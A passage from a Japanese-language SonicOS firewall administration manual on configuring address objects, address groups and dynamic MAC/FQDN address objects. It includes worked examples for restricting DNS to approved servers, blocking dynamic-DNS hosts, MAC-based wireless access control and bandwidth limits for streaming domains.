• 表示 - IPv4 エントリだけを表示するには「IPv4」、 IPv6 エントリのみを表示するには「IPv6」、

すべてのエントリを表示するには「IPv4 および IPv6」を選択します。

• 表示 - 「既定」を選択してシステムで作成された既定のエントリのみを表示するか、「ユーザ定

義」を選択してユーザ定義エントリのみを表示するか、あるいは「すべての種別」を選択してすべてのエントリを表示します。

• 再表示アイコン - アイコンを選択すると、テーブルの表示が更新されます。

• 解決策 (およびアイコン) - 「解決」を選択して 1 つまたは複数の MAC または FQDN エントリで

解決を実行するか、「すべて解決」を選択してテーブル内のすべての MAC または FQDN エント

リを解決します。詳細については、動的アドレスオブジェクト : 機能と利点テーブルを参照し

てください。



• 消去 (およびアイコン) - 「消去」を選択して、選択した MAC または FQDN アドレスオブジェク

トから期限切れの情報を削除するか、「すべて消去」を選択してすべての MAC エントリまた

は FQDN エントリの新情報を削除します。 MAC アドレスオブジェクトの場合は ARP 情報、

FQDN アドレスオブジェクトの場合は DNS TTL 値です。

共通の列見出し

• チェックボックス - 選択して個別エントリを選択します。

• # - テーブル内のエントリの番号。この番号は、列を降順と昇順のどちらで並べ替えるかに応じ

て変化します。「アドレスグループ」画面には、そのグループのエントリを展開または折りた

たむことができる小さな三角形が表示されます。

• 名前 - アドレスオブジェクトまたはアドレスグループエントリの一意の名前。アドレスグループエントリが展開されている場合、この列に次の情報が表示されます。

• アドレスグループの各メンバーの一意の名前。

• アドレスグループにメンバーがない場合は、「登録がありません」という文字列。

• 詳細 - アドレスオブジェクトの詳細として該当するアドレスやマスクが表示されます。アドレ

スグループエントリでは、この列は空白になります。ただし、エントリを展開すると、グ

ループのメンバーの詳細が表示されます。

• 種別 - 「ホスト、ネットワーク、範囲、 MAC アドレス、 FQDN」など、アドレスオブジェクトの

種別が表示されます。アドレスグループでは、種別は「グループ」です。エントリを展開する

と、各メンバーの種別が表示されます。

• IP バージョン - アドレスオブジェクトまたはアドレスグループのメンバーの IP バージョン(IPv4、IPv6、または混在)が表示されます。

• ゾーン - アドレスオブジェクトまたはアドレスグループのメンバーに割り当てられたゾーンが

ある場合は表示されます。

• クラス - アドレスオブジェクトまたはアドレスグループが既定 (システム定義) か個別 (ユーザ

定義) かが表示されます。

• コメント - コメントアイコンの上をマウスでポイントすると、エントリに関する次のような詳

細を示すポップアップ情報が表示されます。

• アドレスオブジェクト - 以下の情報が表示されます。

• アドレスオブジェクトの名前

• 参照元: - アドレスオブジェクトの参照元と、参照された回数。参照されたことの

ないアドレスオブジェクトの場合は、このセクションに「リストなし」と表示さ

れます。

メモ：既定のアドレスオブジェクトと既定のアドレスグループは削除できません。



• グループ (所属先): - アドレスオブジェクトが所属するグループのリスト。グルー

プに所属していないアドレスオブジェクトの場合は、このセクションに「リスト

なし」と表示されます。

• アドレスグループ - 以下の情報が表示されます。

• アドレスグループの名前

• 参照元: - アドレスグループの参照元と、参照された回数。参照されたことのない

アドレスグループの場合は、このセクションに「リストなし」と表示されます。

• グループ (所属先): - アドレスグループが所属するグループのリスト。グループに

所属していないアドレスグループの場合は、このセクションに「リストなし」と


• メンバー: - このグループに所属するアドレスオブジェクトのリスト。メンバーがな

いアドレスグループの場合は、このセクションに「リストなし」と表示されます。

• 設定 - エントリごとに編集アイコンと削除アイコンが表示されます。削除できるのは、ユーザ

定義アドレスオブジェクトとアドレスグループのみです。また、編集できるのは、個別エン

トリと一部の既定のエントリのみです。編集または削除できないエントリのアイコンは淡色表示になります。

エントリの並べ替え「アドレスオブジェクト」画面と「アドレスグループ」画面には、アドレスオブジェクトとアドレ

スグループを見やすくするためのテーブルが表示されます。

テーブルのエントリを並べ替えるには、列見出しを選択します。登録は昇順または降順で並べ替えられます。列登録の右側にある矢印が、並べ替え状況を示します。下向きの矢印は昇順を意味します。上向きの矢印は、降順 (アルファベット A-Z または上から 0 から始まる数字) を示します。

既定のアドレスオブジェクトおよびアドレスグループ「既定」表示では、ファイアウォールの既定のアドレスオブジェクトおよびアドレスグループが表

示されます。一方の画面で「既定」表示を選択すると、他方の画面でのこの表示が選択されます。既定のアドレスオブジェクトのエントリは変更や削除ができませんが、既定のアドレスグループは変

更や削除が可能です。そのため、次のようになっています。



• 「アドレスオブジェクト」画面では、編集アイコンと削除アイコンは淡色表示になっています。

• 「アドレスグループ」画面では、編集アイコンはほとんどのエントリで、削除アイコンは少数を

除くすべてのエントリで淡色表示になっています。編集または削除が可能なエントリでは、そうした操作に必要なアイコンが使用可能になっています。

既定の Pref64 アドレスオブジェクト NAT64 機能をサポートするために、 SonicOS では新しい既定のネットワークアドレスオブジェクトで

ある Pref64 が作成されています。これは NAT64 ポリシーのための変換前の送信先であり、常に

pref64::/n となります。すべてのアドレスを pref64::/n で表して、 NAT64 を実行できるすべて

の IPv6 クライアントを表すネットワーク種別のアドレスオブジェクトを作成できます。例:

Well-Known Prefix の 64:ff9b::/96 は SonicOS によって自動的に作成されます。 Pref64 の詳細につい

ては、 Pref64::/n の使用 (107 ページ) および NAT64 ポリシーのための WAN から WAN へのアクセスルー

ルの作成 (146 ページ) を参照してください。

アドレスオブジェクトの追加アドレスオブジェクトは、 NAT ポリシー、アクセスルール、サービスを設定する前に定義する必要

があります。

アドレスオブジェクトを追加するには、以下の手順を実行します。


2 「アドレスオブジェクト」画面で、ページの上部にある「追加」を選択して、「アドレスオブ

ジェクトの追加」ダイアログを表示します。

3 「名前」フィールドに、 VAP のわかりやすいネットワークアドレスオブジェクトの名前を入力

します。

4 「ゾーンの割り当て」ドロップダウンリストからアドレスオブジェクトのゾーンを選択します。



5 「種別」ドロップダウンリストから次のいずれかを選択し、「種別」を選択すると表示される関連フィールドを入力します。

• ホスト - 「IP アドレス」フィールドに IP アドレスを入力します。

• 範囲 - 「開始アドレス」フィールドと「終了アドレス」フィールドに開始アドレスと終

了アドレスを入力します。

• 「ネットワーク」および「ネットマスク/接頭辞長」フィールドに、ネットワーク IP アド

レスとネットマスク (255.255.255.0 など) またはプレフィックス長 (24 など) を入力します。

• 「MAC」を選択した場合は、「MAC アドレス」フィールドに MAC アドレス (00:11:f5:1b:e3:cf など) を入力し、必要に応じて、「マルチホームホスト」チェックボッ

クスをオンにします (既定でオンになっています)。 MAC アドレスオブジェクトの詳細に

ついては、動的アドレスオブジェクト : 機能と利点を参照してください。

• FQDN - 「FQDN ホスト名」フィールドに、個々のサイトまたはサイトの範囲 (ワイルドカー

ド ‘*’ を使用) のドメイン名を入力します。必要に応じて DNS 登録のTTLの手動設定を選択

し、関連フィールドに存続時間を秒単位で入力します。小値は 120、大値は 86400です。 FQDN アドレスオブジェクトの詳細については、動的アドレスオブジェクト : 機



能と利点テーブルを参照してください。


必要に応じて、この手順を使用して別のオブジェクトを追加します。

7 終了したら「閉じる」を選択します。

アドレスオブジェクトの編集

アドレスオブジェクトを編集するには、次の手順に従います。


2 必要に応じて、「アドレスオブジェクト」ボタンを選択して、「アドレスオブジェクト」画

面を表示します。

3 「アドレスオブジェクト」テーブルの「設定」カラムにある編集アイコンを選択します。「ア

ドレスオブジェクトの編集」ウィンドウが開き、「アドレスオブジェクトの追加」ウィンド

ウと同じ設定項目が表示されます (アドレスオブジェクトの追加 (189 ページ) を参照)。

4 完了したら「OK」を選択します。

ユーザ定義アドレスオブジェクトの削除

ユーザ定義のアドレスオブジェクトを削除するには：




3 「設定」カラムで、削除するアドレスオブジェクトに対応する削除アイコンを選択します。

4 確認のダイアログボックスで「OK」を選択し、アドレスオブジェクトを削除します。

1 つ以上のユーザ定義のアドレスオブジェクトを削除するには、以下の手順に従います。

1 「オブジェクト > アドレスオブジェクト」ページで、「アドレスオブジェクト」画面を表示し

ます。

2 削除するエントリのチェックボックスを選択します。

メモ：編集できるのは、ユーザ定義アドレスオブジェクトと一部の既定のアドレスオブジェク

トのみです。

メモ：削除できるのは、ユーザ定義アドレスオブジェクトのみです。



3 ページ上部にある「削除」ドロップダウンリストから「選択の削除」を選択します。

4 確認のダイアログボックスで「OK」を選択します。

すべてのユーザ定義アドレスオブジェクトを削除するには：


ます。

2 ページ上部にある「削除」ドロップダウンリストから「すべて削除」を選択します。


MAC または FQDN アドレスオブジェクトの消去「消去」は、 MAC または FQDN アドレスオブジェクトから古い ARP または DNS 情報を削除するため

に使用します。

1 つまたは複数の MAC または FQDN アドレスオブジェクトを消去するには：


2 必要に応じて、「アドレスオブジェクト」ボタンを選択して、「アドレスオブジェクト」画面

を表示します。

3 消去するエントリのチェックボックスを選択します。

4 「消去」ボタンを選択して、「消去」を選択します。

すべての MAC または FQDN アドレスオブジェクトを消去するには：


ます。

2 「消去」ボタンを選択して、「すべて消去」を選択します。

アドレスグループの作成ファイアウォールに追加されたアドレスオブジェクトの数が増えてきたら、アドレスのグループを

作成することで、アドレスやアクセスポリシーの管理を容易にすることができます。グループに加

えた変更は、アドレスグループ内の各オブジェクトに適用されます。アドレスグループには、アド

レスオブジェクトだけでなく、他のアドレスグループも含めることができます。

アドレスオブジェクトを追加するには：


2 ページの上部にあるアドレスグループボタンを選択します。

3 「アドレスグループ」画面で「追加」を選択し、を追加すると、「アドレスオブジェクトグループの追加」ダイアログが表示されます。



4 グループに付ける説明的な一意の名前を「名前」フィールドに入力します。

5 左側のリストから目的のアドレスオブジェクトまたはグループを選択し、右矢印を選択しま

す。選択した項目が右側のリストに移動します。 Ctrl または Shift キーを押しながら選択する

と、複数のオブジェクトを選択できます。

グループから項目を削除するには、右の列で項目を選択し、左矢印を選択します。選択した項目は、右側のリストから左側のリストに移動します。


アドレスグループの編集

アドレスグループを編集するには：


2 「アドレスグループ]ボタンを選択すると、「アドレスグループ」画面が表示されます。

3 「アドレスグループ」テーブルの編集可能なエントリの「設定」列の「編集」アイコンを選択

します。「アドレスグループの編集」ウィンドウが表示されます。

4 名前を変更するには、「名前」フィールドを編集します。

5 グループに項目を追加するには、左側のリストから目的のアドレスオブジェクトまたはグループを選択し、右矢印を選択します。選択した項目が右側のリストに移動します。 Ctrl または

Shift キーを押しながら選択すると、複数のオブジェクトを選択できます。

グループから項目を削除するには、右の列で項目を選択し、左矢印を選択します。選択した項目は、右側のリストから左側のリストに移動します。

6 完了したら「OK」を選択します。

アドレスグループの削除

カスタムアドレスグループを削除するには：


メモ：編集できるのはユーザ定義および一部の規定のアドレスグループのみです。削除できる

のはユーザ定義アドレスグループのみです。

メモ：カスタムアドレスグループだけを削除できます。



2 「アドレスグループ」ボタンを選択すると、「アドレスグループ」画面が表示されます。

3 アドレスオブジェクトを削除するには、「設定」カラムで、削除するアドレスグループに対

応する「削除」アイコンを選択します。

4 確認のダイアログボックスで「OK」を選択し、アドレスグループを削除します。

1 つ以上のカスタムアドレスグループを削除するには：

1 「オブジェクト > アドレスオブジェクト」ページで、「アドレスグループ」ボタンを選択して、

「アドレスグループ」画面を表示します。

2 削除するエントリのチェックボックスを選択します。

3 ページ上部にある「削除」ドロップダウンリストから「選択の削除」を選択します。


すべてのカスタムアドレスグループを削除するには：

1 「オブジェクト > アドレスオブジェクト」ページで、「アドレスグループ」ボタンを選択して、

「アドレスグループ」画面を表示します。

2 ページ上部にある「削除」ドロップダウンリストから「すべて削除」を選択します。


動的アドレスオブジェクトの使用SonicOS では初期のバージョンから常に、ユーザインターフェースのほとんどの領域において、 IP アドレスを表すためにアドレスオブジェクトが使われてきました。アドレスオブジェクトの種別につ

いては、アドレスオブジェクトの種別 (183 ページ) を参照してください。

SonicOS は、 2 種類の動的アドレスオブジェクトをサポートします。

• MAC - SonicOS では、ファイアウォールの ARP キャッシュを参照することにより、 MAC AO を IPアドレスに解決します。

• FQDN - 完全修飾ドメイン名 (例えば "www.reallybadwebsite.com" など) は、ファイアウォールの

設定で指定されている DNS サーバを使用して (1 つまたは複数の) IP アドレスに解決されま

す。 ‘*’ を使用するワイルドカードエントリもサポートされており、ワイルドカードを指定す

ると、承認済み DNS サーバへの問い合わせに対する応答が収集されるようになります。

トピック :

• 動的アドレスオブジェクトの主要な機能 (194 ページ)

• ネットワーク上の承認済みサーバの使用の強制 (196 ページ)

• MAC および FQDN 動的アドレスオブジェクトの使用 (198 ページ)

動的アドレスオブジェクトの主要な機能

動的アドレスオブジェクト (DAO) とは、 MAC AO および FQDN AO の使用を可能にする基底フレーム

ワークのことを表す用語です。アクセスルールは、アドレスオブジェクトを静的な構造から動的な

構造に変換することによって、ネットワークの変化に自動的に対応できます。

動的アドレスオブジェクト : 機能と利点テーブルには、 DAO の詳細と例が示されています。



動的アドレスオブジェクト : 機能と利点

機能利点

FQDN ワイルドカードのサポート

FQDN アドレスオブジェクトでは*.somedomainname.com のようなワイルドカードエントリがサポートされています。ワイルドカードエントリが指定された場合は、まず基本ドメイ

ン名が解決されて、それに対して定義されているすべてのホスト IP アドレスに変換され、そ

の後、ファイアウォールを通過する DNS 応答のアクティブな収集が継続的に行われます。

例えば、 *.myspace.com の FQDN AO を作成すると、まずファイアウォールの設定で指定されている DNS サーバが使用されて、 myspace.com が 63.208.226.40、63.208.226.41、 63.208.226.42、 63.208.226.43、に解決されます (このことは nslookup myspace.com、またはそれと同等のコマンドによって確認できます)。ほとん

どの DNS サーバではゾーン転送は許可されないので、通常はドメイン内のすべてのホスト

を自動的に列挙することはできません。それに代わる方法として、ファイアウォールは、ファイアウォールを通過する DNS 応答を監視して、承認済み DNS サーバから発信されたDNS 応答を探します。そのため、ファイアウォールの背後のホストが外部 DNS サーバに対して問い合わせを行った場合、そのサーバがファイアウォール上の設定済み/定義済み DNSサーバであるときには、その応答がファイアウォールによって解析され、いずれかのワイルドカード FQDN AO のドメインに一致するかどうかが調べられます。

メモ：補足: "承認済み DNS サーバ" とは、ファイアウォールが使用する DNS サーバとして設定されている DNS サーバのことです。承認済み DNS サーバからの応答のみをワイルド

カードの学習プロセスで使用する理由は、意図的に不正なホストエントリが設定された未承認 DNS サーバの使用によって FQDN AO のポイズニングが発生する危険を防止するためで

す。 SonicOS の将来のバージョンでは、すべての DNS サーバからの応答をサポートするオプ

ションが提供される可能性があります。アクセスルールを使うと、承認済み DNS サーバの使用を強制することができます。その方法については、この後のネットワーク上の承認済みサーバの使用の強制 (196 ページ) で説明します。

例として、 4.2.2.1 と 4.2.2.2 の DNS サーバを使用するようにファイアウォールが設定されていて、ファイアウォールで保護されているすべてのクライアントに対して DHCP 経由でこれらの DNS サーバが提供されている場合を考えてみましょう。ファイアウォールで

保護されているクライアント A が vids.myspace.com に対応するアドレスの問い合わせを 4.2.2.1 または 4.2.2.2 に対して行ったとすると、ファイアウォールでは、それに対

する応答が検査され、定義済みの *.myspace.com FQDN AO に一致するものと判断されます。そして、その問い合わせの結果 (63.208.226.224) は、 *.myspace.com DAO に対

応する解決済みの値として追加されます。

メモ：上記の例で、 *.myspace.com AO が作成される前に、クライアント A のワークス

テーションが vids.myspace.com を解決して、その結果をキャッシュしていたとすると、クライアントは新しい DNS 要求を発行する代わりにリゾルバのキャッシュを使用する

ので、ファイアウォールによる vids.myspace.com の解決は行われません。そのため、別のホストによって vids.myspace.com の解決が行われない限り、ファイアウォールは

vids.myspace.com について学習する機会を得られないことになります。 MicrosoftWindows を使用しているワークステーションでは、 ipconfig /flushdns コマンドを使用して、ローカルリゾルバのキャッシュを消去することができます。このキャッシュの消去を行う

と、クライアントはすべての FQDN を解決するようになるので、それらのアクセス時にファイアウォールがその解決の情報を取得することが可能になります。

ワイルドカード FQDN エントリは、そのドメイン名のコンテキストに含まれるすべてのホ

スト名に解決されます (アドレスオブジェクトあたり大 256 エントリまで)。例えば、

*.sonicwall.com と指定されている場合、 www.sonicwall.com、software.sonicwall.com、 licensemanager.sonicwall.com は、それぞれの IP アドレスに解決されますが、 sslvpn.demo.sonicwall.com は別のコンテキストのドメイン名であるため解決されません。ワイルドカード FQDN AO によって sslvpn.demo.sonicwall.com を解決するには、 *.demo.sonicwall.com というエン

トリを指定する必要があります。このエントリを指定した場合は、sonicos-enhanced.demo.sonicwall.com、 csm.demo.sonicwall.com、sonicos-standard.demo.sonicwall.com などのドメイン名も解決されます。

メモ：ワイルドカードは、部分一致ではなく完全一致のみをサポートします。つまり、*.sonicwall.com は正当な入力ですが、 w*.sonicwall.com、 *w.sonicwall.com、および w*w.sonicwall.com は違います。ワイルドカードはエントリごとに 1 つしか指定

できないので、例えば *.*.sonicwall.com は機能しません。



ネットワーク上の承認済みサーバの使用の強制ネットワーク上の承認済みサーバ (許可されたサーバ) の使用を強制することは必須ではありません

が、そのような設定を行うことをお勧めします。この設定は不正なネットワーク活動の抑止に有効であるだけでなく、 FQDN ワイルドカードの解決プロセスの信頼性を確保するためにも役立ちます。一

般に、既知のプロトコルによる通信のエンドポイントは可能な限り明確に定義することが望ましいと言えます。以下に例を示します。

• 承認済みサーバ (SMTP サーバ、 DNS サーバなど) のアドレスグループを作成します。

DNS の使用によ

る FQDN の解決

FQDN アドレスオブジェクトは、ファイアウォールの「ネットワーク > DNS」ペー

ジで設定された DNS サーバを使用して解決されます。 DNS 登録は複数の IP アドレ

スに解決される場合が多いので、 FQDN AO 解決プロセスは、 AO あたり大 256 個の登録までの範囲で、ホスト名に対応するアドレスをすべて取得します。解決プロセスでは、 FQDN の IP アドレスへの解決だけでなく、 DNS 管理者による設定に

基づいて、登録の TTL (存続期間) の関連付けも行われます。この TTL は、古くなっ

た FQDN 情報が使われることを防ぐために利用されます。

動的 ARP キャッ

シュデータの使

用による MAC アドレスの解決

ファイアウォールのいずれかの物理セグメントにおいて、 ARP (Address ResolutionProtocol) メカニズムによってノードが検出されると、ファイアウォールの ARPキャッシュが更新され、そのノードの MAC アドレスと IP アドレスが追加されま

す。この更新が発生した場合、そのノードの MAC アドレスを参照する MAC アドレ

スオブジェクトが存在するときには、解決されたアドレスのペアを使用して、その

アドレスオブジェクトが直ちに更新されます。ノードが使われなくなって、その

ノードの ARP キャッシュがタイムアウトした場合 (ホストとファイアウォールの L2接続が切断された場合など) には、その MAC AO は未解決状態に移行します。

MAC アドレスオブジェクトによるマルチホームのサポート

MAC AO ではマルチホームのノードをサポートする設定を使用できます。マルチ

ホームのノードとは、物理インターフェースごとに複数の IP アドレスが割り当て

られているノードのことです。各 AO では大 256 個の解決済みエントリを指定で

きます。この方法を使用すると、 1 つの MAC アドレスが複数の IP アドレスに解決

される場合でも、そのすべての IP アドレスに対して、その MAC AO を参照するア

クセスルールなどが適用されるようになります。

自動と手動の更新処理

MAC AO エントリはファイアウォールの ARP キャッシュに自動的に同期され、

FQDN AO エントリには DNS エントリの TTL 値が適用されるため、解決済みの値は

常に新しい状態に保たれます。これらの自動的な更新処理に加えて、個々の DAOまたは定義済みのすべての DAO を対象として手動で更新および削除を実行するこ

ともできます。

DNS の使用によ

る FQDN の解決

FQDN アドレスオブジェクトは、ファイアウォールの「ネットワーク > DNS」ペー

ジで設定された DNS サーバを使用して解決されます。 DNS 登録は複数の IP アドレ

スに解決される場合が多いので、 FQDN AO 解決プロセスは、 AO あたり大 256 個の登録までの範囲で、ホスト名に対応するアドレスをすべて取得します。解決プロセスでは、 FQDN の IP アドレスへの解決だけでなく、 DNS 管理者による設定に

基づいて、登録の TTL (存続期間) の関連付けも行われます。この TTL は、古くなっ

た FQDN 情報が使われることを防ぐために利用されます。

動的アドレスオブジェクト : 機能と利点

機能利点



• 該当するゾーンのアクセスルールを作成して、内部ネットワーク上の承認済み SMTP サーバに

のみ SMTP 通信の発信を許可し、それ以外のすべての SMTP 発信トラフィックを遮断すること

により、意図的または意図しないスパムの送信を防止します。

• 該当するゾーンのアクセスルールを作成して、内部ネットワーク上の承認済み DNS サーバに

対して、すべての宛先ホストとの DNS プロトコル (TCP/UDP 53) による通信を許可します。

• 該当するゾーンのアクセスルールを作成して、ファイアウォールで保護されたホストからの DNS(TCP/UDP 53) 通信を承認済み DNS サーバに対してのみ許可し、それ以外のすべての DNS アクセ

スを遮断することにより、未承認の DNS サーバとの通信の発生を防止します。

• 上記のルール設定後に、許可されていないアクセスが試行された場合は、ログの表示によってそのことを確認できます。

重要：内部ネットワーク上に DNS サーバを設置している場合は、必ずこのルールを定義

したうえで、アクセスを制限する次の DNS ルールを設定する必要があります。



MAC および FQDN 動的アドレスオブジェクトの使用

MAC および FQDN の動的アドレスオブジェクトを使用すると、アクセスルールを非常に柔軟な形で

作成できるようになります。 MAC アドレスオブジェクトおよび FQDN アドレスオブジェクトの設定

は、静的アドレスオブジェクトの場合と同じ方法で「オブジェクト > アドレスオブジェクト」ペー

ジから行います。動的アドレスオブジェクトの作成後に、その表示項目にマウスを合わせると、そ

のオブジェクトの状況が表示されます。また、動的アドレスオブジェクトの追加や削除を行うと、

その操作がイベントとしてログに記録されます。

動的アドレスオブジェクトは、さまざまな用途に使用できます。以下に示す例は、可能な活用方法

のごく一部にすぎません。

トピック : :

• FQDN DAO の使用による、ドメインに対するすべてのプロトコルのアクセス遮断 (198 ページ)

• FQDN ベースのアクセスルールに適した内部 DNS サーバの使用 (200 ページ)

• MAC アドレスによる動的ホストのネットワークアクセスの制御 (201 ページ)

• ドメイン全体へのアクセスの帯域幅管理 (203 ページ)

FQDN DAO の使用による、ドメインに対するすべてのプロトコルのアク

セス遮断

非標準ポートを使った処理や、未知のプロトコルの使用、暗号化やトンネル化 (またはその両方) によ

るトラフィックの意図的な不明瞭化などを行っているという理由から、特定の送信先 IP アドレスへ

のすべてのプロトコルのアクセスを遮断することが望ましい場合があります。具体的な例としては、ホームネットワークのトンネルを通すことによってトラフィックを不明瞭化するという目的で、 DSLモデムまたはケーブルモデムに接続されたホームネットワーク上に HTTPS プロキシサーバを設定し

た場合 (あるいはその他の方法で、 53、 80、 443 などの“信頼できる"ポート、および 5734、 23221、63466 などの非標準ポートのポート転送/ トンネル化を行っている場合) などが考えられるでしょう。

このようなネットワークではポートが予測不能であるだけでなく、多くの場合、 IP アドレスも動的に

設定されるため同様に予測不能となり、状況はさらに複雑化します。

これらのシナリオでは、通常、ユーザによるホームネットワークの特定ができるように動的 DNS(DDNS) 登録が利用されるので、 FQDN AO を積極的に使えば DDNS レジストラに登録されているすべて

のホストへのアクセスを遮断できます。

想定条件

• 10.50.165.3 と 10.50.128.53 の DNS サーバを使うようにファイアウォールが設定されて

いるとします。

• ファイアウォールは、ファイアウォールで保護されているすべてのユーザに対して DHCP リース

を提供しているものとします。ネットワーク上のすべてのホストは上記の設定済み DNS サーバ

を使用して解決を行います。

• 未承認 DNS サーバへの DNS 通信を遮断したければアクセスルールを使います。ネット

ワーク上の承認済みサーバの使用の強制 (196 ページ) を参照してください。

メモ：ここでは例として DDNS ターゲットの場合を示しています。非 DDNS ターゲットドメイン

も同様に使用できます。



• DSL ホームネットワークのユーザが DDNS プロバイダ DynDNS に登録しているホスト名が moosifer.dyndns.org であるとします。このセッションで ISP がこの DSL 接続に割り当てた

アドレスは、 71.35.249.153 であるとします。

• 同じ IP アドレスに対して別のホスト名を登録することは容易なので、後からホスト名が

追加されることを想定して FQDN AO を使用しています。必要に応じて、別の DDNS プロ

バイダに対応するエントリを追加することもできます。

手順 1 - FQDN アドレスオブジェクトの作成:




3 「追加」を選択し、次の FQDN アドレスオブジェクトを作成します。

初に作成された時点では、 dyndns.org のアドレス (例えば、 63.208.196.110) のみがこのエント

リの解決先になります。ファイアウォールで保護されているホストが承認済み DNS サーバを使

用して moosifer.dyndns.org の解決を試行した場合、その問い合わせに対する応答として返され

た (1 つまたは複数の) IP アドレスが FQDN AO に動的に追加されます。

手順 2 - アクセスルールの作成


2 「追加」を選択し、次のアクセスルールを作成します。



この FQDN に含まれるターゲットホストへのアクセスはプロトコルに関係なく遮断され、アク

セスが試行された場合は、そのイベントがログに記録されます。

FQDN ベースのアクセスルールに適した内部 DNS サーバの使用

DHCP で動的に構成されるネットワーク環境は、内部ホストの登録を動的に行うために、内部 DNSサーバと組み合わせて運用されるのが一般的であり、広く使われている Microsoft の DHCP サービスと

DNS サービスもその一例です。このようなネットワークでは、ネットワーク上のホストを設定するこ

とによって、適切に設定された DNS サーバ上の DNS レコードの動的更新を容易に実現することがで

きます (詳細については、 Microsoft のサポート技術情報「Windows Server 2003 で DNS 動的更新を構成

する方法」 (http://support.microsoft.com/kb/816592/ja) などを参照してください)。

次の図は、典型的な DNS 動的更新プロセスのパケットの詳細情報を示したものです。この例では、

動的に設定されたホスト (10.50.165.249) が、 (DHCP で提供された) DNS サーバ (10.50.165.3) に対し

て、完全なホスト名 (bohuymuth.moosifer.com) を登録していることがわかります。

メモ：送信元として LAN Subnets を指定する代わりに、必要に応じて、より限定的な送信

元を指定することによって、特定のホストからの送信のみを対象としてターゲットへのアクセスを禁止することもできます。



http://support.microsoft.com/kb/816592/en-us

このような環境では、 FQDN AO を利用して、ホスト名によるアクセス制御を行うことが有益な場合が

あります。この方法がも有効に適用できるのは、ネットワーク内のホスト名が既知の場合 (ホスト

名のリストが保持されている場合や、一貫した名前付け規則が使用されている場合など) です。

MAC アドレスによる動的ホストのネットワークアクセスの制御

ほとんどのネットワークでは静的なアドレス設定よりも DHCP が利用されることの方がはるかに多い

ため、特に、動的な DNS 更新が行われていない場合や、ホスト名が常に確定しているとは言えない環

境では、動的に設定されるホストの IP アドレスを予測するのが困難な場合があります。このような

状況では、 MAC アドレスオブジェクトを使用することにより、ほぼ不変の MAC (ハードウェア) アド

レスに基づいてホストのアクセスを制御することができます。

その他のほとんどのアクセス制御方法と同様、 MAC アドレスによるアクセス制御も、アクセスを原

則的に許可して特定のホストまたはホストのグループを送信先/送信元とするアクセスのみを禁止す

る方法と、アクセスを原則的に禁止して特定のホストまたはホストのグループに対してのみアクセスを許可する方法のどちらでも利用できます。ここでは、例として後者の場合を示します。

DHCP 対応の複数の無線クライアントがあり、それらのクライアントで独自のオペレーティングシス

テムが実行されているため、ユーザレベルの認証は一切利用できないと仮定します。このとき、そ

れらのクライアントに LAN 上のアプリケーション固有のサーバ (例えば、 10.50.165.2) へのアクセ

スのみを許可することを考えます。 WLAN セグメントではセキュリティのために WPA-PSK が使用され

ていますが、これらのクライアントからのアクセスを許可する対象は 10.50.165.2 のサーバのみで

あり、 LAN 上のそれ以外のリソースへのアクセスはすべて禁止しなければなりません。また、その他

のすべての無線クライアントに対しては、 10.50.165.2 へのアクセスのみを禁止し、それ以外の場

所へのアクセスはすべて許可する必要があります。



手順 1 - MAC アドレスオブジェクトの作成

MAC アドレスオブジェクトを作成するには、以下の手順に従います。


2 必要に応じて、「アドレスオブジェクト」ボタンを選択して、「アドレスオブジェクト」画面


3 「追加」を選択し、次の MAC アドレスオブジェクトを作成します (マルチホームのオプション

は必要に応じて選択します)。

4 アドレスオブジェクトの作成完了時点において、対象のホストがファイアウォールの ARP キャッ

シュに含まれている場合は、直ちにその解決が行われます。 ARP キャッシュ内にホストの情報

が存在しない場合は、ホストが有効化されて ARP によって検出されるまでの間、「アドレスオブジェクト」テーブルにはそれらのアドレスが「未解決」状態として表示されます。

5 ハンドヘルドデバイス用のアドレスグループを作成します。


アクセスルールを作成するには：


2 「追加」を選択し、サンプルのアクセスルールテーブルに示されている設定で 4 つのアクセス

ルールを作成します。



ドメイン全体へのアクセスの帯域幅管理

ストリーミングメディアは、ネットワークの帯域幅をも大量に消費するサービスの 1 つです。スト

リーミングメディアを配信しているサイトでは、ほとんどの場合、多数のサーバからなるサーバ

ファームが利用されているため、これらのサイトへのアクセスを制御したり、サイトへの接続に割り当てられる帯域幅を管理したりすることは容易ではありません。さらに、これらのサイトではメディアが再エンコードされてから HTTP で送信される場合が多いので、種別による分類や分離を行うこと

はいっそう難しくなっています。これらのサイトを構成しているサーバのリストを手動で管理するのは困難な仕事ですが、ワイルドカード FQDN アドレスオブジェクトを使用すると、その作業を簡単化

することができます。

手順 1 - FQDN アドレスオブジェクトの作成

FQDN アドレスオブジェクトを作成するには、以下の手順に従います。





4 次のアドレスオブジェクトを作成します。

アドレスオブジェクトが初に作成された時点では、 *.youtube.com は 208.65.153.240、208.65.153.241、 208.65.153.242 の IP アドレスに解決されますが、内部ホストが youtube.com ドメイン内のすべての要素に対応する各ホストの解決を開始した後は、 v87.youtube.com サーバ

サンプルのアクセスルール

設定アクセスルール 1 アクセスルール 2 アクセスルール 3 アクセスルール 4

許可 / 拒否許可禁止許可禁止

送信元ゾーン WLAN WLAN WLAN WLAN

送信先ゾーン LAN LAN LAN LAN

サービス MediaMoose サービス

MediaMoose サービス

すべてすべて

送信元ハンドヘルド機器すべてハンドヘルド機器すべて

送信先 10.50.165.2 10.50.165.2 すべてすべて

許可ユーザすべてすべてすべてすべて

スケジュール常に有効常に有効常に有効常に有効

メモ：この例では、ハンドヘルド機器によって使用される特定のアプリケーションを表すために「MediaMoose サービス」というサービスを使用しています。固有サービスの宣言

はオプションであり、必要に応じて行ってください。



(208.65.154.84) のエントリなど、内部ホストからの問い合わせによって取得されたホストエン

トリが追加されていきます。

ステップ 2 - 帯域幅オブジェクトを作成する

帯域幅オブジェクトを作成するには：

1 管理ビューで、「ポリシー | オブジェクト > ア帯域幅オブジェクト」ページを開きます。

2 「追加」を選択し、次の帯域幅オブジェクトを作成します。


アクセスルールを作成するには：


2 「追加」を選択し、次のアクセスルールを作成します。



一般画面：

帯域幅管理画面：

メモ：「セキュリティ設定 | ファイアウォール設定 > 帯域幅管理」ページで、「帯域幅管理

の種別」が「詳細」に設定されている場合にのみ、帯域幅オブジェクトを選択できます。



アクセスルールが作成された後、「アクセスルール」テーブル内に、帯域幅管理が有効であ

ることを示す帯域幅管理アイコンと統計情報が表示されるようになります。マウスポインタを

アイコンの上に移動すると、帯域幅管理設定が表示されます。

*.youtube.com のすべてのホストに対するアクセスは、どのプロトコルを使用している場合

でも、累積的に、すべてのユーザセッションで利用可能な合計帯域幅の低率 1 MBP までに制限

されます。

メモ：「帯域幅管理」ボタンが表示されない場合は、 WAN インターフェースで帯域幅管

理を有効にします。



8

